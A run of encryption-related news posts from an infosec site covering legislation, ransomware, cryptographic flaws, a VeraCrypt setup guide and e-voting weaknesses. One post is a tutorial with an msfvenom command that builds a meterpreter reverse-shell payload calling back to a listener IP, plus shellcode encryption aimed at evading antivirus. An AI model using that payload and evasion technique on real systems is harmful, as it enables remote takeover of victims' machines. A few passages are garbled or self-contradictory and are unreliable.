The “Online Safety Bill” was initially intended to criminalize material inciting self-harm that was posted to social media platforms like Facebook, Instagram, TikTok, and YouTube, but it was later altered to concentrate more generally on illegal content relating to adult and child safety. The original proposal was to prohibit content promoting self-harm posted to social media platforms like Facebook, Instagram, TikTok, and YouTube. In spite of the fact that government representatives have said that the measure would not prohibit end-to-end encryption, the messaging applications have stated in an open letter that “The bill provides no explicit protection for encryption.”

It goes on to say that if it is implemented in its current form, “could empower OFCOM [the Office of Communications] to try to force the proactive scanning of private messages on end-to-end encrypted communication services, thereby nullifying the purpose of end-to-end encryption and compromising the privacy of all users.” According to WhatsApp and Signal, OFCOM is a government-approved institution that is entrusted with regulating broadcast, telecommunications, and postal services in the UK. However, if the bill is passed, OFCOM might misuse its ability to scrutinize individual chats and spy on users without their knowledge.

“In a nutshell, the bill poses an unprecedented threat to the privacy, safety, and security of every citizen of the United Kingdom and the people with whom they communicate around the world, while also providing encouragement to adversarial governments that may seek to draft copycat laws,” Signal has said in a statement on Twitter that it will “not back down on providing private, safe communications,” in response to the open letter that encourages the government of the United Kingdom to rethink the way that the law is presently drafted. Both businesses have said that they would stop supporting the applications in the United Kingdom rather than take the risk of lowering their present encryption standards. They have stuck by their statements.

WhatsApp is regarded as the number one most-used encryption app, having garnered more than two billion monthly active users in the previous years. In light of the fact that WhatsApp is used all over the world, the company believes that its fears are well-founded. It explains in the letter that it is impossible to continue providing end-to-end encryption services while the UK government is expanding its monitoring of the applications. In the letter, WhatsApp and Signal said that they are not the only ones that have issues over the UK Bill and that these worries are shared by others. “The United Nations has issued a stern warning, stating that the attempts made by the United Kingdom’s government to enforce backdoor restrictions represent “a paradigm shift that presents a variety of major difficulties with possibly disastrous implications.”

The Online Safety Bill aims to address what lawmakers consider a major concern of child abuse and child sexual abuse material going unregulated in the UK. It also targets pornographic deepfakes, criminalizes encouraging self-harm, and requires social media sites to more strictly enforce their terms of service. The law makes it clear that any communications that violate its criteria would be subject to monitoring by the government. Paying a kid for sexual services, instigating the development of material depicting child sexual abuse, or organizing or acquiring material depicting child sexual abuse are all examples of these types of crimes.

The post UK government new bill proposes to remove encryption from WhatsApp and Signal appeared first on Information Security Newspaper | Hacking News.

Before learning about the decryption tool, let’s take a look at some details on the development of ransomware, in addition to its encryption process and mistakes made by its creators.

Development & behavior

TaRRaK is written in .NET and its code is not protected with obfuscation or any other bypass method. When executed, the ransomware creates a mutex identified as TaRRaK to ensure that only one instance of the malware runs, in addition to creating an auto-start registry entry to run the ransomware on each login of the target system:

The ransomware contains a list of 178 file extensions:

 After avoiding folders with strings such as $Recycle.Bin, :\Windows, \Program Files, \Local\Microsoft\, and :\ProgramData\, the encrypted files receive the .TaRRaK file extension:

Flaws at encryption

The source code and encryption process are riddled with bugs:

The malware sample attempts to read the entire file into memory using File.ReadAllBytes(). This feature has an internal limit that states that a maximum of 2 GB of data can be loaded; in case the file is larger, the function throws an exception, which is then handled by the try-catch block, which only handles a permission denied condition.

TaRRaK adds an ACL entry that grants full access to everyone and retrys the data read operation. In case any other error occurs, the exception is regenerated and the ransomware enters an infinite loop.

Even if the upload operation is successful and data from the file may enter memory, the Encrypt function converts the byte array to a 32-bit array of integers.

The malware allocates another block of memory with the same size as the file size and then performs an encryption operation, using a custom encryption algorithm. The encrypted Uint32 array is converted to another byte array and written to the file. Therefore, in addition to the memory allocation for the data in the original file, two additional blocks are allocated; if any of the memory allocations fail, it throws an exception and the ransomware loops again.

In the unusual scenarios where ransomware manages to complete the encryption process without errors, a ransom note will appear in the root folder of the compromised drives, in addition to displaying an advertisement on the user’s desktop:

Decryption tool

Avast specialists detailed the process to decrypt files infected with TaRRaK ransomware:

• Log in to the same account as the affected user
• Download the free Avast decryptor for Windows 32-bit or 64-bit
• Run the downloaded file
• On the home page, after reading the license information, click “Next”

• On the next page, select the list of locations where you want to apply decryption. By default, the tool contains a list of all local drives:

• You can choose to back up the encrypted files in case something goes wrong during the decryption process. Finally, click “Decrypt” to recover your information.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

The post Free decryption tool for TaRRaK ransomware. How to recover your infected files? appeared first on Information Security Newspaper | Hacking News.

This variant of encryption allows data to be encrypted so that third parties cannot read it, although it does allow third parties and third-party technologies to perform operations using the protected data. For example, a user could use homomorphic encryption to upload sensitive data to a cloud deployment to perform data analysis; cloud solutions could perform the analyses and send the resulting information to the user without reading the sensitive data.

Aydin Aysu, an expert at North Carolina State University in charge of the research, says, “Homomorphic encryption is attractive because it preserves data privacy, but allows users to make use of that information, even though it requires a lot of computing resources.” Given the large amount of hardware and software resources required, this is not a practical implementation.

Microsoft has excelled in the development of homomorphic encryption, creating the SEAL Homomrphic Encryption Library to facilitate research among the specialized community. Aysu’s report notes that there is a way to crack homomorphic encryption using the SEAL library through a side-channel attack.

According to the report, the researchers detected this vulnerability at least in SEAL versions prior to 3.6: “This library receives constant updates, so it is likely that the flaw will be corrected in later iterations, although it is also not ruled out that later versions remain exposed to this vulnerability.

Finally, experts point out that side-channel attacks are a widely documented hacking variant, so organizations with adequate security protocols should have no problem containing this threat: “With the advancement of homomorphic encryption, the computer industry must ensure that it incorporates the necessary security tools for protection against side-channel attacks and other security threats,” concludes Aysu.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Vulnerability in next-generation homomorphic encryption allows data to be stolen even while encrypted appeared first on Information Security Newspaper | Hacking News.

A couple of months ago the French authorities detailed the operation of Operation Venetic, with which they managed to compromise the security of an account in the EncroChat encrypted messaging application, allowing law enforcement agencies across Europe to collect the evidence needed to make more than 1500 arrests. After this incident, court hearings on this communications network were expected to start, although everything started after the defense asked the French government for more information on how the authorities accessed this network.

The defense mentions that this process of presenting evidence has been complicated because the prosecution does not have the necessary knowledge to understand the information contained in the documents related to the EncroChat hacking. Moreover, it is anticipated that this will be the defense main argument, which calls into question the legality and admissibility of evidence obtained from encrypted communications on this network.

The British authorities made hundreds of arrests thanks to information obtained from this operation, so the UK National Crime Agency (NCA) has recommended that courts prepare to receive at least 400 similar appeals.

Jonathan Kinnear, specialist in the Organized Crime Division of the Crown Prosecutor’s Office, mentions that the prosecution was already working to process requests from defense attorneys: “We have been working to respond to all these requests, analyzing the characteristics of the disclosure of this information that some consider to be a secret not subject to being presented as evidence.”

The defense is even raising new questions about the ability of the French authorities to break security on such platforms, even though police agencies in the Netherlands and Belgium recently claimed to have compromised the security of Sky ECC, another encrypted communications platform. In a joint report, the authorities of these countries claimed to have accessed more than one billion encrypted messages from this network, which would also have allowed multiple arrests to be made.

In addition to questioning these practices, the defense argued that the compromise of these files would constitute a violation of the fundamental rights of the accused.

Since the leaks revealed by former US National Security Agency (NSA) employee Edward Snowden, it is a well-known and well-documented fact that multi-country governments invest millions in developing tools and software capable of breaking security mechanisms in encrypted communication systems.

Internal documentation of the NSA has suggested that this agency has already achieved compromised at least one encrypted communication system, although there is no mention of the allegedly compromised platform. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post The police forensic department doesn’t wants to share how they hacked into secure encrypted phone networks to the court appeared first on Information Security Newspaper | Hacking News.

The one-way functions that form the basis of most algorithms depend on the difficulty of solving some problems even with access to a computer with high processing capabilities. RSA security, for example, is based on the difficulty of factoring the product from two large prime numbers.

As you may remember, the RSA cryptographic system uses integer factoring and since its release became one of the most widely used resources for digital encryption. Other types of cryptography use elliptical curves to create a one-way function that cannot be decrypted except through a brute force attack that involves testing as many keys as possible.

Claus Schorr, a mathematician and cryptographer, mentions that prime factorization can be reduced to a shorter vector problem, which could be easier to decipher. The premise of his research, entitled “Fast Factoring Integers in SVP Algorithms,” is that this process could destroy RSA encryption.

If verified, this technique would be functional even if longer encryption values are implemented. It should be remembered that increasing the length of the encryption key is a common response to ensure that algorithms remain in place in the complex world of computing.

The problem is that, if the decryption process of this method was trivialized, a lot of systems considered secure that depend on RSA would become unsafe or at least vulnerable to all kinds of known or known attacks.

Cryptography specialist Matthew Green commented, “I think the general consensus is that this is an exciting approach that, unfortunately, right now has no practical evidence of effectiveness, and associating a particular researcher’s name with him should not be seen as a real change.”

As Green mentions, this decryption method has not yet been extensively demonstrated, much less tested in real or controlled environments, although for many this is a clear alarm signal for organizations to try to reinforce potential weaknesses before cybercriminals take advantage of these flaws. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.

The post A method to possibly break RSA encryption algorithm is revealed appeared first on Information Security Newspaper | Hacking News.

This time, specialists from the International Institute of Cyber Security (IICS) will show you how to encrypt a hard drive and protect any actor’s data from threats. Encryption is good as the first line of defense, because if someone steals your laptop and manages to eject the hard drive you will be in trouble accessing the information. Encryption can also be implemented at folder and file level.

ENCRYPTION WITH WINDOWS SYSTEM TOOLS

BitLocker Device Encryption is Microsoft’s encryption tool built into Windows 10 Pro and Enterprise. Although it works, BitLocker has several disadvantages:

• If BitLocker was not pre-installed on your computer, installation and configuration can be difficult
• Bitlocker functions may differ on different devices; it all depends on your motherboard
• As mentioned above, BitLocker only works with Windows 10 Professional and Enterprise

Luckily there are several alternatives. VeraCrypt is an option that is not affected by the drawbacks of BitLocker:

• It’s much easier to install than BitLocker
• It’s independent of your computer’s hardware
• Works on any version of Windows 10

VeraCrypt is free and open source software that is also considered more secure by the cybersecurity community in general. After installing VeraCrypt, you will only need to enter your password each time you start your computer.

HOW TO INSTALL VERACRYPT

Installing VeraCrypt is a relatively complicated process and there is even the possibility of losing files if any step is done wrong. IICS specialists recommend careful reading the installation instructions before starting the process. If you do not feel sure to apply the process correctly, it is recommended to try to install the tool.

INSTALLATION ON WINDOWS 10

• You will need a USB stick to save VeraCrypt Emergency Disk Recovery. Take a USB stick and format it in FAT or FAT32 so it’s ready when you need it
• You will also need a program to unzip files
• Go to the VeraCrypt download page and search for the Windows installer
• Run the VeraCrypt installation, leave all items as default. In the first window, you can select the installation language
• After a while, the message “VeraCrypt was successfully installed”
• Click OK, and then click Finish to complete the installation. VeraCrypt will display a message as in the screenshot below

• If you have never used VeraCrypt, it is best to follow this tutorial. Click Yes to view the guide or No to skip. Anyway, we’ll show you the rest of the steps in this article
• Run VeraCrypt, then select the System menu, then Encrypt System Partition/Disk

• The “Veracrypt Volume Creation Wizard” window will then appear. You will need to choose the encryption type: NORMAL or HIDDEN. Normal only encrypts the entire system. This is what we want, so select that option
• The program will ask if only the Windows system partition or the entire drive should be encrypted. If you have multiple partitions with important data, you can encrypt the entire drive. If you only have one partition on disk (like us), there will be an option: “Encrypt windows system partition”. Select this item and click Next

• The next window is “Number of operating systems”. If you have multiple operating systems, choose Multiple Boot. Otherwise, choose Single Boot. Click Next”
• The encryption settings window will then appear. We recommend that you choose AES for encryption and SHA-256 for hashing. Both are widely used algorithms
• The next step will be to create a password. It is better to choose a reliable one to protect the system from any hacking attempt. Many password managers (such as Bitwarden) have tools to generate strong passwords automatically. VeraCrypt will alert you if your password is not secure enough
• The following is the collection of random data. You will need to move the mouse randomly within the window. This increases the strength of encryption keys. Once the indicator at the bottom of the window is full, proceed to the next step
• Then the “Generated Keys” window will appear. Here you just need to click on the “Next” button.
• You must then create a recovery disk. You can skip creating a physical recovery disk, but this is not a recommended measure. Note where the backup ZIP image will be stored, then click Next
• If you did not skip creating a recovery disk in the previous step, you will need to address it now. VeraCrypt doesn’t say how to do this, but we’ll explain it below. You will need to use the USB that was formed at the start of the process; insert it into your computer and navigate to the directory where VeraCrypt stores ZIP images. Use 7-zip (or any other decompression program) to extract the files from the “VeraCrypt Rescue Disk.zip” file to the root of your USB drive. When finished, click Next to have VeraCrypt verify that the copy is correct
• If all went well, you will see a chart mentioning “Verified Recovery Disk”. Remove the USB stick and go to the next step
• In the next step will appear is the cleaning mode window. Normally, there is nothing to do with this function. Make sure it’s set to No (faster) and click Next
• The System Encryption Pre-Test window appears. VeraCrypt will now check if encryption works on your system. The following image explains in detail what will happen. Click Test to see how this happens. Note that VeraCrypt will probably show you a few more and similar warnings before you actually run the test, so be prepared for that
• If everything went well, the computer will restart and you will see a window like the following screenshot

IICS experts recommend backing up all important files before starting this process. This will allow you to recover them if something serious happens in the middle of the encryption process, such as a blackout or system failure.

If you are completely sure that the process completed successfully, press ENCRYPT. VeraCrypt will show you some documents that you may want to print or save as PDF; this information is important so please do not ignore it.

If the encryption has been successful, remember that you will now need to enter your password each time you try to access the system.

The post How to encrypt a hard drive in Windows 10 in two simple ways appeared first on Information Security Newspaper | Hacking News.

In its internal documentation and propaganda, Zoom claims to have end-to-end encryption with 256-bit level. However, the constant scrutiny of the security of this platform showed that these claims were false, as Zoom provides a much lower level of security, potentially compromising millions of users.

The FTC argues that the level of encryption Zoom uses is much lower than promised, so the company is committed to upgrading its systems and improving its user protection mechanisms. It is important to remember that the number of users of the company increased to almost 300 million people during the most recent months due to the pandemic.

“Zoom’s claims are misleading and harm users who have turned to this platform at a time as complex as the current one,” adds demand from the FTC. As part of the agreement between developers and authorities, Zoom will need to establish a system that actually complies with what its advertising documents mention. In other words, the platform will implement 256-bit end-to-end encryption as soon as possible.

As long as the implementation of this new encryption is realized, the company will respond directly to concern users any questions about the security of the platform.

Mac users were recently found to face a similar encryption issue related to “ZoomOpener”, which was installed secretly to avoid Safari security measures that open a dialog box before starting the application. The FTC is still deliberating on the case and Zoom is currently required to provide its 256-bit end-to-end security guarantee for its users.

The post Zoom sued by U.S. government for lying about its end-to-end encryption in video calls appeared first on Information Security Newspaper | Hacking News.

Experts estimate that the number of masking protocol usage aiming to hide the actual network device addresses from external systems are increasing in Russia, so authorities have made a compromise to stop the spreading of such practice.

In the bill, Ministry of Digital Science argues: “The use of these algorithms and encryption methods can reduce the efficiency of our existing filtering systems, which will cause the complex identification of resources on the Internet containing sensitive information, as well as any data source banned by the Russian Federation”.

Exploit writing course experts say that, in case of any breach against this law, the Ministry would suspend the working of the Internet resource used to break the law. Besides, the Ministry points out that the Unified Register of Russian Programs for Electronic Computers and Databases contains information about encryption protocols that can be used for criminal investigation purposes.

It is worth remembering that Russian Internet operates with serious restrictions, so the use of protocols like DoH or DoT can bypass such blocking policy hiding a request by encryption, so Russian Internet service providers won’t be able to block a specific resource because the users can hide their URL. 

Reportedly, Russian government is set to start its capabilities for blocking traffic encrypted with DNS over HTTPS technology; these tests were supposed to start back in May 2020, but these were rescheduled due to technical issues, as reported by exploit writing course experts. The bill also states that it was prepared following a demand of the Russian Security Council dated December 4, 2019 as a plan to counter de spread of illegal information, of course, according to the Russian Federation criteria.  

TLS 1.3 is the latest version of the Transport Layer Security protocol, released back in August 2018. This version includes independent process such as key negotiation, authentication, and cipher suites. On the other hand, DNS over TLS (DoT) is a proposed standard protocol for performing remote DNS resolution using TLS. The goal of this technique is to improve user privacy and security by preventing interception and manipulation of DNS data through Man-in-the-Middle (MiTM) attacks.

The post Russia is set to ban advance encryption technologies. Will the US follow such measure? appeared first on Information Security Newspaper | Hacking News.

This is not the first time an electronic voting system is involved in Russian elections. In 2019, Moscow’s IT department developed a remote voting system based on blockchain technology. As a result, the votes were encrypted using the department’s own version of an ElGamal encryption. After multiple tests, experts found several vulnerabilities in the encryption system.

In this new system, the voters’ ballot is encrypted with the help of TweetNaCI.js, a JavaScript library developed by a researcher named Dmitry Chestnykh, who discovered that the developers of Russia’s remote electronic voting system were using their framework.

Greater security when voting?

The above system encrypted each vote individually, using a unique secret key. Therefore, to decrypt a vote, it had to obtain the secret key of the recipient, in this case, the electoral committee. On the other hand, the new system issues a shared key for the sender and recipient; in this case the voter and the electoral committee, which can be used to encrypt the vote, as well as to decrypt it, as mentioned by security testing course experts.

To test the new system, Meduza researchers conducted an experiment on an electronic ballot that was issued with Google Chrome, discovering that obtaining the secret key is relatively easy. According to the experts, it was possible to decipher the ballot of a voter who participated in the experiment, so voters are confident that the integrity of their vote is preserved.

On the other hand, security testing course experts mention that this allows users to force the vote. In theory, an employer could, in addition to verifying that its employees have voted, find out how the vote was cast. In addition, saving these encryption keys does not require an employee to have technological knowledge. For example, they might be asked to download a special extension for a browser, which replaces randomly generated keys with static ones. This would greatly simplify the task of decrypting votes, as everyone would share a single encryption key.

This same feature can be used to monitor the integrity of the vote count, in case the electoral commission refuses to disclose the encryption keys for each specific electronic ballot. For example, supporters of a particular candidate might agree to install the same browser extension, which would allow them, over the course of the voting period, to track the minimum number of votes their candidate should have during the final count.

Developers of e-voting systems could ban voters from using a shared set of encryption keys, but this would be futile. According to the developer of this framework, there are multiple ways to circumvent such security controls, including browser extensions that write seemingly random encryption keys that can be restored at a later date. “An extension could simply save the keys to a central database,” Chestnykh also suggested. “The Curve25519 algorithm is very fast, so deciphering millions of votes would be easy.”

For further reports on vulnerabilities, exploits, malware variants and computer security risks, it is recommended to enter the website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.

The post Russia online voting system vulnerabilities allow seeing who voted for whom appeared first on Information Security Newspaper | Hacking News.

Shellcode, the next phase of successfully finding exploit. Every hackers needs shellcode to compromise the target, your shellcode decides of how much you get control of the victim. Even shellcode encryption plays a big role in hiding malware from Antivirus, VMs and Sandboxes.

Today we will walk you through the technique to encrypt your shellcode and similar techniques are used by researcher of International institute of Cyber Security to test malware’s in labs.

Environment

• OS: Kali Linux 2019.3 64bit
• Kernel-Version: 5.2.0

Installation Steps

• Use this command to clone the project.
• git clone https://github.com/ReddyyZ/GhostShell

root@kali:/home/iicybersecurity# git clone https://github.com/ReddyyZ/GhostShell
Cloning into 'GhostShell'...
remote: Enumerating objects: 27, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 185 (delta 15), reused 0 (delta 0), pack-reused 158
Receiving objects: 100% (185/185), 4.49 MiB | 1.60 MiB/s, done.
Resolving deltas: 100% (91/91), done.

• Use the cd command to enter into ghostshell directory.

root@kali:/home/iicybersecurity# cd GhostShell/
root@kali:/home/iicybersecurity/GhostShell#

• We use msfvenom to generate and output different types of shellcode and it is a command-line interface.
• Now, let’s generate shellcode using msfvenom. Use this command to generate shellcode.
  • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=80 -f c

• We successfully generated shellcode
• Now, use this command to compile the github project code file.
  • gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode

• After, using this command it generates encrypt_shellcode file. Use ls command to view the file.

root@kali:/home/iicybersecurity/GhostShell# gcc -m32 -fno-stack-protector -z execstack encrypt_shellcode.c -o encrypt_shellcode
root@kali:/home/iicybersecurity/GhostShell# ls
assets encrypt_shellcode encrypt_shellcode.c LICENSE main.c main.h README.md

• Lets assume that the below is our shellcode.

\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1

• Now, we can encrypt the shellcode using this command
  • Command Format: ./ encrypt_shellcode e “key” “shellcode”
  • e: encypt the shellcode
  • key: \xde\xad\xbe\xef

root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode e "\xde\xad\xbe\xef" "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
Encrypted: \x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f

• Now, we can decrypt the shellcode using this command
  • Command Format: ./ encrypt_shellcode d “key” “shellcode”
  • D: Decypt the shellcode

root@kali:/home/iicybersecurity/GhostShell# ./encrypt_shellcode d "\xde\xad\xbe\xef" "\x4e\xac\xbd\xee\xc7\x48\xbd\xee\xdd\xad\x81\x18\xa4\x22\x7f"
Decrypted: \x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1

Conclusion

We saw how we encrypt and decrypt the shellcode using the unique key. If the shellcode executes on the victim’s machine it is undetected on the remote machine.

The post Generate Shellcode to Bypass the AVs, VMs, and Sandboxes appeared first on Information Security Newspaper | Hacking News.

One of the affected researchers shared via Twitter a screenshot of the message they received after loggin into their servers, which is supposed to be a ransom note.

In this message, hackers assure all data stored on IIT’s systems has been encrypted and victims have to pay a ransom to get the decryption key. To contact the attackers, victims should use nothing but the email address they provide in their message (happychoose@cock.li). “After that, you are supposed to get a decryption tool with the instructions to use it”, mentioned the affected data protection expert.

In response to massive concern, IIT’s General Secretary has asked all staff, investigators and students to back up their data: “We are under a serious attack that has compromised all computers running Windows system used in the campus. We are asking users to backup their data as soon as possible”. Besides, campus’ administration fears that attackers are aiming to critical computers on IIT’s networks, as a point to access other parts of their systems and deploy second stage attacks.

Manu Zacharia, a data protection specialist, has told about this incident: “This is obviously a massive ransomware attack. Attack methods used by this hackers seems to be quite sophisticated, as ITT’s servers had stop working long before the ransomware were detected”. In addition to Zacharia’s statements, other cybersecurity firms assured IIT is a usual cyberattack target.

At this point, admins don’t seem to have a backup plan; nonetheless, International Institute of Cyber Security (IICS) considers that it could be a matter of time to know the firsts details on the incident, such as the malware variant used by the attackers, their method or the sum demanded to victims.

The post IIT Madras hit by ransomware. All research and exams data encrypted appeared first on Information Security Newspaper | Hacking News.

RSA certificates are an example of public key cryptography. This method uses two different encryption keys: a private key and a public key. The private key is used to decrypt messages or generate digital signatures, while the public key can encrypt data or verify digital signatures. This method is safe as long as an attacker does not know either of the two factors used for RSA calculation.

However, ethical hacking specialists consider this assumption will not always be valid, as demonstrated in a study of 75 million public RSA keys, one in 172 of these keys share a common factor.

These common factors represent a serious security issue for RSA keys, as they could allow a threat actor to determine the two prime factors used in the calculation. This information would help to derive the private key associated with the public key. In the study, researchers managed to find the private keys for more than 435k out of the 75 million RSA keys analyzed.

In their report, ethical hacking specialists attribute this security weakness to the continued growth of IoT device use, as they have reduced entropy and significant energy constraints. It should be noted that entropy is a fundamental factor in generating a secure random key; since these devices generate the same random numbers frequently when they try to identify prime numbers to use in RSA certificates it greatly increases the chance that these certificates will share a prime value, becoming vulnerable to attack.

According to the International Institute of Cyber Security (IICS), it is vital to address these security risks, as we can currently find IoT devices in virtually every home in the world, so their use for malicious purposes could expose millions of users.    

The post Millions of IoT devices are hackeables due to weaknesses in RSA encryption appeared first on Information Security Newspaper | Hacking News.